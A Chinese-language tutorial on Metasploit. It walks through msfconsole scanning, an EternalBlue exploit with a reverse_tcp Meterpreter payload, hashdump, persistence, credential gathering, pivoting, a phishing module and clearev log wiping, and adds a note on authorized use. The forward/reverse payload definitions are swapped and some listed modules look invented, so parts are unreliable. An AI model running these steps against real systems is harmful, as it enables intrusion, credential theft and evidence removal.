Metasploit常用命令详解
一、Metasploit 概述
Metasploit是一款开源的渗透测试框架,由 H.D. Moore 于 2003 年首次发布,目前由 rapid7 公司维护。它整合了大量漏洞利用模块、后渗透工具和漏洞扫描功能,已成为网络安全工程师、红队 / 蓝队成员及安全研究人员的核心工具之一。
下载最新版安装包: metasploitframework-latest.msi
Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit
永久添加脚本执行目录到当前用户的PATH: setx PATH "%PATH%;C:\metasploit-framework\bin"
Metasploit -- 目录详解及常用命令
Metasploit基础和基本命令详解
Metasploit Framework(MSF)命令汇总
二、核心功能与组件
-
漏洞利用模块(Exploits)
- 包含数千个针对不同系统、应用的漏洞攻击代码(如 Windows、Linux、Web 服务等),支持自动匹配目标环境。
- 示例:
exploit/windows/smb/ms17_010_eternalblue
(针对永恒之蓝漏洞)。
-
Payload(攻击载荷)
- 漏洞成功利用后执行的代码,可分为:
- 正向 Payload:目标主动连接攻击者(如
windows/meterpreter/reverse_tcp
)。 - 反向 Payload:攻击者主动连接目标(更绕过防火墙,如
windows/meterpreter/bind_tcp
)。
- 正向 Payload:目标主动连接攻击者(如
- 漏洞成功利用后执行的代码,可分为:
-
辅助模块(Auxiliary)
- 非漏洞利用功能,包括:
- 扫描器(如
auxiliary/scanner/portscan/tcp
)、嗅探器、Fuzz 测试工具等。
- 扫描器(如
- 非漏洞利用功能,包括:
-
后渗透模块(Post)
- 获得目标权限后执行的操作,如数据窃取、权限维持、网络信息收集(
post/windows/gather/enum_logged_on_users
)。
- 获得目标权限后执行的操作,如数据窃取、权限维持、网络信息收集(
-
编码器(Encoders)
- 对 Payload 进行加密或变形,绕过杀毒软件检测(如
x86/shikata_ga_nai
)。
- 对 Payload 进行加密或变形,绕过杀毒软件检测(如
打开Metasploit: msfconsole
Metasploit功能列表:
1. Exploit Modules:用于攻击和利用目标系统的漏洞。
2. Payloads:攻击成功后在目标系统上执行的代码,如反向 Shell。
3. Auxiliary Modules:辅助功能,如扫描和嗅探。
4. Encoders:用于编码 Payloads 以规避检测。
5. Post Modules:在目标系统上进一步操作的模块,如提权、信息收集等。
6. Nop Generators:用于生成 NOP(No Operation)指令,帮助躲避 IDS/IPS。
三、工作流程与典型场景
1. 基本渗透测试流程
目标信息收集 → 漏洞扫描 → 选择Exploit与Payload → 配置参数 → 执行攻击 → 后渗透操作
2. 实战示例:获取 Windows 主机权限
# 1. 启动Metasploit msfconsole
# 2. 搜索永恒之蓝漏洞模块 search ms17-010
# 3. 加载漏洞利用模块 use exploit/windows/smb/ms17_010_eternalblue
# 4. 配置目标IP set RHOSTS 192.168.1.100
# 5. 配置Payload(反向连接)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 攻击者 set LHOST 192.168.1.101
# 监听端口 IP set LPORT 4444
# 6. 执行攻击 exploit
3. 后渗透常用命令
sysinfo
:查看系统信息hashdump
:获取密码哈希upload/download
:文件传输persistence
:创建持久化后门
四、优势与局限性
优势
1. 模块化设计,支持自定义扩展;
2. 覆盖主流平台与漏洞,更新频繁;
3. 图形化界面(Metasploit Pro)降低使用门槛。
局限性
1. 依赖已知漏洞,对 0day 攻击支持有限;
2. 流量特征易被检测,需配合免杀技术;
3. 新手需学习编程(如 Ruby)才能开发自定义模块。
五、安全合规与学习资源
-
合规提示
- 仅可在授权环境(如企业内部测试、CTF 竞赛)中使用,未经允许攻击公共网络属于违法行为。
-
学习资源
- 官方文档:Metasploit Documentation
- 实战书籍:《Metasploit 渗透测试指南》《Web 渗透测试实战》
- 在线平台:TryHackMe、Hack The Box(模拟靶场)
六、延伸:Metasploit 的演进与分支
- Metasploit Pro:商业化版本,集成漏洞管理、报告生成等企业级功能。
- Cobalt Strike:后渗透工具,常与 Metasploit 配合使用,具备更隐蔽的 C2 通信能力。
- Armitage:Metasploit 的图形化前端,支持鼠标拖拽式渗透测试。
通过掌握 Metasploit,安全人员可系统性地验证网络防御体系的薄弱环节,而攻击者也可能利用其自动化能力实施攻击。因此,企业需结合 IDS/IPS、EDR 等工具监控异常流量,并及时修补系统漏洞。
七、标准的渗透测试流程示例
1、信息收集(Reconnaissance)
信息收集(Reconnaissance)和 扫描和枚举(Scanning and Enumeration) 获取目标的信息,如 IP 地址、域名等。扫描目标网络,发现开放端口和服务,枚举详细信息。
2、服务扫描
# 调用Nmap并将扫描结果导入Metasploit数据库中
db_nmap -sV -O 192.168.1.0/24
# 扫描网络中的所有活动主机
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
run
# 扫描特定主机上的开放端口,识别运行的服务
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
run
# 枚举 SMB 服务的版本,了解系统运行的具体服务信息
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.100
run
# 识别 FTP 服务版本
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.100
run
# 识别 HTTP 服务版本
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.100
run
查看已发现的主机和服务
hosts
services
3、漏洞评估(Vulnerability Assessment)或漏洞扫描
识别目标系统中的已知漏洞。
可使用自动化工具:Nessus OpenVAS全面扫描漏洞。
1. 扫描漏洞
# 扫描目标系统的多种漏洞
use auxiliary/scanner/vulnerabilities/realvuln
set RHOSTS 192.168.1.0/24
run
# 扫描 Metasploit 框架支持的漏洞
use auxiliary/scanner/msf/msfscan
set RHOSTS 192.168.1.0/24
run
# Metasploit Pro 版提供更强大的自动化漏洞扫描功能,可以自动化许多步骤,并生成详细报告
use pro
set WORKSPACE default
set RHOSTS 192.168.1.0/24
run
2. 导入其他工具扫描结果
# 导入 Nessus 扫描结果
load nessus
nessus_connect username:password@127.0.0.1:8834
nessus_report_list
nessus_import_report <report_id>
# 导入 OpenVAS 扫描结果
load openvas
openvas_connect username:password@127.0.0.1
openvas_report_list
openvas_import_report <report_id>
3、利用漏洞(Exploitation)
利用发现的漏洞获取对目标系统的访问权限
# 利用目标 SMB 服务的已知漏洞,设置目标主机和本地主机的相关参数并执行攻击
search smb
use exploit/windows/smb/ms17_010_eternalblue
show targets # 查看所选模块支持的模板平台和配置
show options # 查看所选模块的可配置选项
set RHOSTS 192.168.1.100 # 设置目标主机地址
check # 验证漏洞
show payloads # 查看可用的有效载荷
set payload windows/x64/meterpreter/reverse_tcp # 选择并配置适当的有效载荷,如反向 shell
set LHOST 192.168.1.50
exploit # 确认目标存在漏洞后,执行攻击
4、后渗透操作(Post-Exploitation)
在获得访问权限后进行进一步操作,如提权、信息收集等。
shell # 在成功获得 Meterpreter 会话后
meterpreter > sysinfo # 查看系统信息
meterpreter > getuid # 获取当前用户 ID
meterpreter > shell # 进入目标系统的命令提示符
5、清理和报告(Cleanup and Reporting)
清理所有操作痕迹,并生成详细的渗透测试报告。
# 清除目标系统的事件日志,避免被检测到,生成渗透测试报告
meterpreter > clearev
4、Metasploit其他功能
社会工程学工具
Social Engineering Toolkit (SET):可以创建各种社会工程攻击,如钓鱼攻击、恶意 USB 制作等。
# 使用 SET 进行钓鱼攻击
use auxiliary/set/social_engineering/phishing
Web 应用测试
Auxiliary Modules:许多辅助模块用于扫描和测试 Web 应用程序漏洞。
凭证收集
1. Meterpreter Scripts:在目标系统上运行脚本以收集密码和其他凭证。
2. Post Exploitation Modules:用于提取存储的密码和会话令牌。
# 使用 Meterpreter 脚本提取凭证
run post/windows/gather/credentials/windows_autologin
网络隧道
1. Pivoting:通过已攻陷的系统建立网络隧道,以访问内网中的其他系统。
2. Portfwd:转发端口以绕过防火墙和访问受限资源。
# 进行 Pivoting
route add 10.0.0.0 255.255.255.0 1
自定义模块开发
编写自定义模块:使用 Ruby 编写自定义漏洞利用和辅助模块,满足特定需求。
Metasploit 本身主要是基于 Ruby 编写的,但它提供RPC接口,可以通过msgrpc服务集成Python脚本。
pyexec插件示例
shell load pyexec
pyexec 'print("Hello from Python")'
通过 RPC 接口与 Metasploit 交互
# 启动 Metasploit RPC 服务
vim rpc_service.rc
load msgrpc ServerHost=127.0.0.1 ServerPort=55552 User=msf Pass=abc123
msfconsole -r rpc_service.rc
vim demo.py
from metasploit.msfrpc import MsfRpcClient
client = MsfRpcClient('abc123', server='127.0.0.1', port=55552)
console = client.consoles.console()
console.write('use exploit/windows/smb/ms17_010_eternalblue\n')
console.write('set RHOSTS 192.168.1.100\n')
console.write('run\n')
任务自动化
1. Resource Scripts:使用 .rc 文件自动化执行一系列 Metasploit 命令。
2. Mettle Payloads:一种新的、更灵活的有效载荷框架,可以执行复杂的任务。
shell # 自动化任务
resource myscript.rc
数据导出和报告
报告生成:生成渗透测试报告,包含详细的测试步骤和结果。
数据导出:将扫描结果和会话数据导出为各种格式。
模块化设计
1. Pluggable Payloads:用户可以自定义和插入自己的有效载荷。
2. Custom Modules:允许用户创建和加载自定义漏洞利用和辅助模块。
混淆与逃避
1. Encoders:对有效载荷进行编码以绕过防病毒软件和入侵检测系统(IDS)。
2. Anti-Forensics:提供工具来混淆日志和删除痕迹。
实时协作
Team Collaboration:Metasploit Pro 支持团队协作,多个用户可以同时对同一目标进行测试。
模拟攻击
Attack Simulations:可以模拟真实的攻击场景,以测试和验证防御措施。
插件支持
Community Plugins:支持用户开发和共享插件,扩展 Metasploit 的功能。
高级报告
Detailed Reporting:生成详细的渗透测试报告,包括发现的漏洞、利用情况和修复建议。
数据库导入
Metasploit 支持从多种第三方漏洞扫描工具导入数据:
Metasploit 第三方软件支持列表
支持的数据格式和工具:
• Foundstone Network Inventory XML
• Microsoft MBSA SecScan XML
• nCircle IP360 XMLv3 and ASPL
• NetSparker XML
• Nessus NBE
• Nessus XML v1 and v2
• Qualys Asset XML
• Qualys Scan XML
• Burp Sessions XML
• Burp Issues XML
• Acunetix XML
• AppScan XML
• Nmap XML
• Retina XML
• Amap Log
• Critical Watch VM XML
• IP Address List
• Libpcap Network Capture
• Spiceworks Inventory Summary CSV
• Core Impact XML Nessus/OpenVAS
导入:可以将 Nessus 或 OpenVAS 的漏洞扫描结果导入 Metasploit 进行进一步分析。
# 导入 Nessus 扫描结果
load nessus
nessus_import_report <report_id>
相关文章:
Metasploit常用命令详解
一、Metasploit 概述 Metasploit是一款开源的渗透测试框架,由 H.D. Moore 于 2003 年首次发布,目前由 rapid7 公司维护。它整合了大量漏洞利用模块、后渗透工具和漏洞扫描功能,已成为网络安全工程师、红队 / 蓝队成员及安全研究人员的核心工…...
2025.6.24总结
今天发生了两件事,这每件事情都足以影响我的工作状态。 1.团队中有人要转岗 这算是最让我有些小震惊的事件了。我不明白,那个同事干得好好的,为啥会转岗,为啥会被调到其他团队。虽然团队有正编,有od,但我自始自终觉得…...
2023年全国青少年信息素养大赛Python 复赛真题——玩石头游戏
今日python每日练习题为——玩石头游戏,大家记得坚持刷题哦,闯入国赛~ 每轮可拿 1-3 块石头,双方均采取最优策略。若石头数 n 为 4 的倍数,无论先手取 k 块(1≤k≤3),后手总能取 4-k 块…...
MySQL之SQL性能优化策略
MySQL之SQL性能优化策略 一、主键优化策略1.1 主键的核心作用1.2 主键设计原则1.3 主键优化实践 二、ORDER BY优化策略2.1 ORDER BY执行原理2.2 ORDER BY优化技巧2.3 处理大结果集排序 三、GROUP BY优化策略3.1 GROUP BY执行原理3.2 GROUP BY优化方法 四、LIMIT优化策略4.1 LIM…...
AI时代工具:AIGC导航——AI工具集合
大家好!AIGC导航是一个汇集多种AIGC工具的平台,提供了丰富的工具和资源。 工具功能: 该平台整合了多样的AIGC工具,涵盖了绘画创作、写作辅助以及视频制作等多个领域。绘画工具能够生成高质量的图像作品;写作工具支持从构思到润色的全流程写…...
性能测试-jmeter实战4
课程:B站大学 记录软件测试-性能测试学习历程、掌握前端性能测试、后端性能测试、服务端性能测试的你才是一个专业的软件测试工程师 性能测试-jmeter实战4 jmeter环境搭建1. 安装Java环境(必需) JMeter环境搭建完整指南1. 安装Java࿰…...
C++字符串的行输入
1、字符串的输入 下面用一个真实的示例来进行演示: #include<iostream> #include<string>int main() {using namespace std;const int ArSize 20;char name[ArSize];char dessert[ArSize];cout << "Enter your name:\n";cin >>…...
【Linux网络与网络编程】15.DNS与ICMP协议
1. DNS 1.1 DNS介绍 TCP/IP 中使用 IP 地址和端口号来确定网络上的一台主机的一个程序,但是 IP 地址不方便记忆,于是人们发明了一种叫主机名的字符串,并使用 hosts 文件来描述主机名和 IP 地址的关系。最初, 通过互连网信息中心(SRI-NIC)来…...
Python训练营-Day40-训练和测试的规范写法
1.单通道图片训练 # import torch # import torch.nn as nn # import torch.optim as optim # from torchvision import datasets, transforms # from torch.utils.data import DataLoader # import matplotlib.pyplot as plt # import numpy as np# # 设置中文字体支持 # plt…...
【Python-Day 29】万物皆对象:详解 Python 类的定义、实例化与 `__init__` 方法
Langchain系列文章目录 01-玩转LangChain:从模型调用到Prompt模板与输出解析的完整指南 02-玩转 LangChain Memory 模块:四种记忆类型详解及应用场景全覆盖 03-全面掌握 LangChain:从核心链条构建到动态任务分配的实战指南 04-玩转 LangChai…...
内存泄漏和内存溢出的区别
内存泄漏(Memory Leak)和内存溢出(Memory Overflow / Out Of Memory, OOM)是软件开发中两个密切相关但又本质不同的内存问题: 核心区别一句话概括: 内存泄漏: 有垃圾对象占用内存却无法被回收&…...
Linux系统---Nginx配置nginx状态统计
配置Nignx状态统计 1、下载vts模块 https://github.com/vozlt/nginx-module-vts [rootclient ~]# nginx -s stop [rootclient ~]# ls anaconda-ks.cfg nginx-1.27.3 ceph-release-1-1.el7.noarch.rpm nginx-1.27.3.tar.gz info.sh …...
linux操作系统的软件架构分析
一、linux操作系统的层次结构 1.内核的主要功能 1)进程管理 2)内存管理 3)文件系统 4)进程间通信、I/O系统、网络通信协议等 2.系统程序 1)系统接口函数库,比如libc 2)shell程序 3)编译器、编辑…...
快速手搓一个MCP服务指南(三):FastMCP的核心组件-构建MCP服务的关键技术实现
FastMCP 是一套面向 LLM 应用开发的工具框架,通过标准化协议衔接大语言模型与外部功能组件,构建「LLM工具」的闭环交互体系。其核心技术体系包含四大模块:工具系统将 Python 函数转化为 LLM 可调用的能力单元,通过类型注解实现参数…...
创建首个 Spring Boot 登录项目
📌 摘要 在 Java Web 开发中,登录功能是最基础也是最重要的模块之一。本文将手把手带你使用 IntelliJ IDEA 和 Maven 构建一个基于 Spring Boot 的简单登录系统,涵盖: 使用 IDEA 创建 Spring Boot 项目配置 Maven 依赖ÿ…...
order、sort、distribute和cluster by(Spark/Hive)
1. abstract ORDER BY:完整查询结果的全局行排序。与SORT BY、CLUSTER BY、DISTRIBUTE BY互斥,不能同时使用。 示例SELECT * FROM table_name ORDER BY column_name;SORT BY:只在每个分区内排序,局部排序结果不是全局有序。与ORD…...
# Python中等于号的使用
# Python中等于号的使用 ## 1. 问题的分析与思考 在Python中,等于号()是一个赋值运算符,用于将右侧的值或表达式的结果赋给左侧的变量。这是Python(以及许多其他编程语言)中非常基础且核心的一个概念。理…...
无人机神经网络模块运行与技术难点
一、神经网络模块的运行方式 1. 分层处理架构 感知层 多模态数据融合:通过八元数卷积网络(OCNN)统一处理LiDAR、摄像头、IMU等异构传感器数据,将点云坐标(x/y/z)、图像RGB与光流信息编码至8维虚部&#…...
宝塔服务器调优工具 1.1(Opcache优化)
第一步:宝塔服务器调优工具 1.1(按照下面的参数填写) 第二步:路径/www/server/php/80/etc/php.ini 搜索jit jit1235 其中1235根据服务器情况修改 第三步:路径/www/server/php/80/etc/php-cli.ini 搜索 jit1235 其中…...
day041-web集群架构搭建
文章目录 0. 老男孩思想-高薪四板斧1. web集群架构图2. 搭建异地备份服务2.1 服务端-阿里云服务器2.1.1 查看rsync软件包2.1.2 添加rsync配置文件2.1.3 添加虚拟用户2.1.4 创建校验用户密码文件2.1.5 创建备份目录2.1.6 启动服务2.1.7 开放安全组端口2.1.8 发送检查邮件 2.2 客…...
国产化条码类库Spire.Barcode教程:如何使用 C# 读取 PDF 中的条码(两种方法轻松实现)
在 PDF 文档的 .NET 平台处理流程中,使用 C# 读取 PDF 条码 是一项常见需求,特别适用于处理扫描件或电子表单。无论是物流、金融、医疗还是制造行业,PDF 文档中经常包含用于追踪或识别的条码。这些条码可能是嵌入图像,也可能是矢量…...
vue 3 计算器
效果: <template><div class"calculator-container"><div class"calculator"><!-- 显示区域 --><div class"display">{{ formattedDisplay }}</div><!-- 按钮区域 --><div class"…...
CRMEB PHP多门店版v3.2.1系统全开源+Uniapp前端+搭建教程
一.介绍 CRMEB多店版是一款为品牌连锁门店打造的私域电商解决方案,以三大运营模式为核心,助力品牌连锁门店轻松构建全渠道、一体化的私域电商生态,促进“线上电商”与“线下门店”销售运营融合,加速品牌数字化转型,为…...
主机复制文字和文件到 Ubuntu 虚拟机
在 VMware Workstation Pro 16 中复制文字和文件到 Ubuntu 虚拟机,方法如下: Open-VM-Tools 禁用 Wayland 解决 。 1.安装 VMware Tools(推荐)或 open-vm-tools: sudo apt update sudo apt install open-vm-tools…...
性能测试 —— 数据库的连接池和主从同步和分表分区
一、数据库的调优(库层面) 1、数据库连接池 1、介绍:数据库连接池(Database Connection Pool)是一种用于管理数据库连接的技术,它通过预先创建并维护一组数据库连接来提高应用程序的性能和可扩展性。 2、创建、管理、关闭 数据…...
猿人学js逆向比赛第一届第十二题
一、分析请求 看到这里只有一个m的密文参数,没有cookie,请求头等其他的参数,那么这里跟一堆栈信息。 很顺利地锁定了m的加密位置。看到是字符串拼接然后使用btoa函数进行编码,那么这里尝试使用Python复现一下。顺利拿到结果。 复现…...
第十节 新特性与趋势-CSS层叠规则升级
以下是关于 CSS层叠规则升级 的全面解析,结合最新规范(如级联层layer)和传统层叠机制的演进,从核心原理、应用场景到实践策略的系统性总结: 一、传统层叠规则的三大支柱 CSS层叠规则的传统机制基于以下三个维…...
关键领域软件工厂的安全中枢如何全面升级供应链检测能力
随着软件供应链安全体系在互联网、金融等领域逐步成熟,关键领域正加速迈向以 MLOps、软件工厂为核心的新型研发生态。在这一过程中,面对代码安全、依赖合规、系统可信等多重挑战,传统人工审查模式已难以满足国家级高安全性要求。 Gitee Scan…...
西门子G120XA变频器:数据中心能效革命的核心引擎
在数字经济爆发式增长的今天,数据中心已成为支撑社会运转的"数字心脏"。然而,其庞大的能耗需求与绿色低碳目标之间的矛盾日益凸显——尤其是冷却系统作为数据中心第二大能耗单元(占比约35%),正成为能效提升的…...
从零开始学习Spring Cloud Alibaba (一)
人狠话不多,直接开始少点屁话本着共同学习进步的目的和大家交流如有不对的地方望铁子们多多谅解 准备工具 开发工具 idea Java环境 jdk17 容器: docker Maven 3.8.6 仓库镜像阿里云 <mirror><id>alimaven</id><name>aliyun maven</name><…...
【C/C++】C++ 编程规范:101条规则准则与最佳实践
C 编程规范:101条规则准则与最佳实践 引言 C 是一门强大而复杂的语言,能高效控制硬件,也能写出优雅抽象。然而,正因其复杂性,项目中若缺乏统一规范,极易陷入混乱、难维护、易出错的泥潭。 本文总结了 10…...
PyTorch topk() 用法详解:取最大值
torch.topk(input, k) 返回张量中最大的 k 个元素以及它们在原张量中的 索引。 函数原型 torch.topk(input, k, dimNone, largestTrue, sortedTrue)参数说明: 参数说明input输入张量k要取出的前 k 个值dim指定沿哪个维度取值(默认是最后一维ÿ…...
毕业论文查重原理及降重方法
【30%的重复率有那么重要吗?】 老师说论文重读率必须低于30%,否则无法毕业! 如果您在专科或者普通本科学生,我只能这样一句话告诉你:你想多了~, 真的想多了~~~,一篇论文还不至于让你不能毕…...
Golang Kratos 系列:业务分层的若干思考(二)
上一篇文章简单讨论了领域层在Kratos中的使用,主要涉及引入领域层,将数据层和业务层之间的解耦,接下来讨论一个稍微全面一点的例子,在此基础上引入外部Api(主要是易变部分)的领域层下的情况。 我们同样可以…...
技术伦理之争:OpenAI陷抄袭风波,法院强制下架宣传视频
在AI巨头OpenAI宣布以65亿美元天价收购苹果前设计总监Jony Ive的硬件公司IO仅一个月后,一场抄袭指控将这家科技明星企业推上风口浪尖。 源自谷歌X实验室的初创企业IYO将OpenAI告上法庭,指控其窃取智能耳塞核心技术,并通过巨额收购试图掩盖抄袭…...
烟花爆竹生产企业库房存储安全风险预警系统
烟花爆竹生产企业库房存储安全风险预警系统是保障库房物资安全、规范作业流程、防范安全事故的重要技术手段,涵盖多个关键预警功能。 温湿度预警 在库房内安装温湿度传感器,这些传感器如同敏锐的“环境感知员”,能够实时监测库房内环境变…...
Jenkins+Jmeter+Ant接口持续集成
2025最新Jmeter接口测试从入门到精通(全套项目实战教程) 前言: 为什么要用Jmeter做接口测试: 当选择这套方案的时候,很多人会问,为什么选择Jmeter做Case管理?为什么不自己写框架?说…...
基于STM32的寻迹小车设计
标题:基于STM32的寻迹小车设计 内容:1.摘要 本文围绕基于STM32的寻迹小车设计展开。背景是随着自动化技术的发展,寻迹小车在工业巡检、物流运输等领域有广泛应用前景。目的是设计一款能稳定、准确寻迹的小车。方法上,以STM32微控制器为核心,…...
【150】基于SSM+Vue实现的小说阅读小程序(有文档)
系统介绍 基于SSMVue实现的小说阅读小程序采用前后端分离的架构方式,系统设计了管理员、用户两种角色,系统分为管理端、小程序端,管理端实现了管理员登录、个人中心、管理员管理、帮助中心管理、基础数据管理、论坛中心管理、公告资讯管理、…...
ValKey中使用SIMD指令优化bitcount命令
一、AVX/AVX2 的历史演进 随着计算机技术的飞速发展,数据处理需求呈指数级增长,SIMD(单指令多数据)技术应运而生。它通过一条指令同时处理多个数据元素,大幅提升计算效率,从早期的 MMX 技术起步࿰…...
leetcode114-二叉树展开为链表
leetcode 114 思路 用简单例子推导规律 不要一开始就看复杂的树,先从最简单的情况入手 案例一:只有一个节点 输入:1 输出:1不需要任何操作,直接返回 案例二:有两个节点 输入: 1/2输出&a…...
第七章 习题
1.给出下面表达式的逆波兰表示(后缀式): 3请将表达式-(ab)* (cd)-(abc)分别表示成三元式,间接三元式和四元式序列 四元式(Op,arg1,arg2,result) (,a,b,T1) (,c,d,T2) (*,T1,T2,T3) (uminus,T3,-,T4) (,a,b,T5) (,T5,c,T6) (-,T4,T6,r) 三元式 (op,arg1,arg2) (0) (,…...
Spring Ai Alibaba Graph实现五大工作流模式
Spring Ai Alibaba Graph实现五大工作流模式 概述 在 building-effective-agents 一文中,Anthropic将"智能体系统"(agentic systems),从架构层面分为 “工作流”(workflows)和 “智能体”(agents): 工作流…...
基于单片机的语音控制设计(论文)
摘要 自然语音作为人机交互在目前得以广泛的应用以及极大的发展前景。该设计介绍了基于非指定人语音芯片LD3320的语音控制器结构及其实现语音控制的方法。该语音控制器利用STM32F103C8T6单片机作为主要控制器,控制芯片对输入的进行语音识别并处理,根据语…...
【网络安全】从IP头部看网络通信:IPv4、IPv6与抓包工具 Wireshark 实战
从IP头部看网络通信:IPv4、IPv6与抓包工具 Wireshark实战 在网络安全分析和数据通信的世界中,一切都始于“数据包”。数据包是网络上传输的基本单位,而数据包的结构与内容,正是我们理解网络行为的核心。本文将带你深入了解 IP 协…...
计算机组成原理笔记(公众号版本)
1.MAR,存储单元和PC位数之间的关系 我们的MAR位数取决于我们的存储单元的个数; PC位数也是取决于我们的存储单元的个数; 假设我们是64个存储单元,我们的这个MAR实际上就是6位,因为这个2的6次方等于我们的64吗&#…...
CPM基本原理
CPM(连续相位调制,Continuous Phase Modulation )是一种恒包络,信号相位随时间连续变化的调制技术 。其优势显著,连续相位特性,频谱效率高,对带外辐射抑制好;相位平滑过渡࿰…...
浅谈开源在线客服系统与 APP 集成的技术方案与优劣势
在为移动端 App 接入在线客服系统的过程中,我经历了长时间的技术选型探索。最初,我也曾被一些“技术理想主义”选项所吸引,比如让用户自己研发界面我提供 API 以获得最高自由度,或集成 SDK 以追求原生体验。然而,随着项…...
AutoGPT,自主完成复杂任务
AutoGPT是一个开源的AI Agent项目,它的核心目标是让AI能够自主完成复杂任务,而不仅仅是回答单个问题。简单来说,它让AI具备了"自主思考和行动"的能力。 1. AutoGPT的核心概念 什么是AI Agent? AI Agent(智…...
基于Qt C++的影像重采样批处理工具设计与实现
摘要 本文介绍了一种基于Qt C++框架开发的高效影像重采样批处理工具。该工具支持按分辨率(DPI) 和按缩放倍率两种重采样模式,提供多种插值算法选择,具备强大的批量处理能力和直观的用户界面。工具实现了影像处理的自动化流程,显著提高了图像处理效率,特别适用于遥感影像处…...